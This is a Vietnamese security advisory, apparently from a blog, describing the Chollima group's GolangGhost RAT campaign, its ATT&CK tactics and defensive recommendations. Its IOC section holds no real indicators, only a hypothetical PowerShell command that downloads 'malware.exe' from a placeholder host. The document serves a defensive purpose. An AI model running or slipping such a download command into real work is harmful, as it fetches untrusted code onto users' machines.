Chiến Dịch Malware Chollima Hackers: Phân Tích GolangGhost RAT và Cách Bảo Vệ

19/06/2025
2 mins read
Nội dung
Tổng Quan về Chiến Dịch Malware của Chollima Hackers
Chiến Thuật, Kỹ Thuật và Quy Trình (TTPs)
Thông Tin về Cơ Sở Hạ Tầng
Indicators of Compromise (IOCs)
Thông Tin về Phần Mềm Độc Hại
Khuyến Nghị Bảo Mật

Tổng Quan về Chiến Dịch Malware của Chollima Hackers

Nhóm tin tặc Chollima, được cho là có liên kết với Triều Tiên, đang nhắm mục tiêu vào người dùng Windows và macOS thông qua phần mềm độc hại GolangGhost RAT. Bài viết này cung cấp thông tin chi tiết về chiến dịch, bao gồm các chiến thuật, kỹ thuật và quy trình (TTPs), Indicators of Compromise (IOCs), cùng các khuyến nghị bảo mật nhằm giảm thiểu rủi ro.

Chiến Thuật, Kỹ Thuật và Quy Trình (TTPs)

Dựa trên các thông tin thu thập được, nhóm Chollima sử dụng các phương pháp tấn công theo khung MITRE ATT&CK như sau:

  • Initial Access (Truy cập ban đầu): Tin tặc sử dụng email phishing để dụ nạn nhân tải xuống phần mềm độc hại.
  • Execution (Thực thi): GolangGhost RAT được triển khai sau khi nạn nhân thực thi tệp độc hại.
  • Persistence (Duy trì hiện diện): Phần mềm độc hại thiết lập cơ chế duy trì lâu dài trên hệ thống bị xâm phạm.
  • Command and Control (C2): Các máy chủ C2 được sử dụng để kiểm soát các thiết bị bị xâm nhập từ xa.

Thông Tin về Cơ Sở Hạ Tầng

Mặc dù thông tin cụ thể về các máy chủ Command and Control (C2) chưa được công bố trong báo cáo này, nhưng việc sử dụng các máy chủ C2 là một phần không thể thiếu trong hoạt động của GolangGhost RAT để điều khiển các hệ thống bị nhiễm từ xa.

Indicators of Compromise (IOCs)

Dưới đây là các chỉ số nhận diện mối đe dọa (IOCs) liên quan đến chiến dịch này:

  • File Hashes: Hiện tại chưa có thông tin về giá trị hash của các tệp độc hại.
  • URLs/Command-Line Examples: Một ví dụ về lệnh PowerShell độc hại có thể được sử dụng trong chiến dịch:
# Ví dụ về lệnh PowerShell độc hại có thể được sử dụng:
powershell -Command "Invoke-WebRequest -Uri 'http://example.com/malware.exe' -OutFile 'C:\Users\username\Downloads\malware.exe'"

Thông Tin về Phần Mềm Độc Hại

GolangGhost RAT: Đây là một Remote Access Trojan (RAT) được nhóm Chollima sử dụng, có khả năng kiểm soát thiết bị từ xa và thực hiện nhiều hành vi độc hại trên cả hai nền tảng Windows và macOS.

Khuyến Nghị Bảo Mật

Để giảm thiểu rủi ro từ chiến dịch này, các tổ chức và cá nhân nên áp dụng các biện pháp sau:

  • Quản Lý Lỗ Hổng (Vulnerability Management): Đảm bảo rằng tất cả phần mềm và hệ điều hành được cập nhật với các bản vá bảo mật mới nhất.
  • Phát Hiện và Phản Hồi Đầu Cuối (Endpoint Detection and Response – EDR): Triển khai các giải pháp EDR để phát hiện và phản hồi kịp thời các hoạt động đáng ngờ trên thiết bị đầu cuối.
  • Đào Tạo Người Dùng (User Education): Nâng cao nhận thức cho người dùng về các mối nguy từ email phishing và các rủi ro khi tải xuống tệp không rõ nguồn gốc.

Thông tin trên cung cấp cái nhìn tổng quan về chiến dịch malware của nhóm Chollima, phù hợp để hỗ trợ các nhóm SOC, quản trị hệ thống hoặc tích hợp vào các nền tảng TIP và SIEM. Các tổ chức nên theo dõi chặt chẽ các chỉ số IOCs và áp dụng các biện pháp phòng ngừa cần thiết để bảo vệ hệ thống của mình.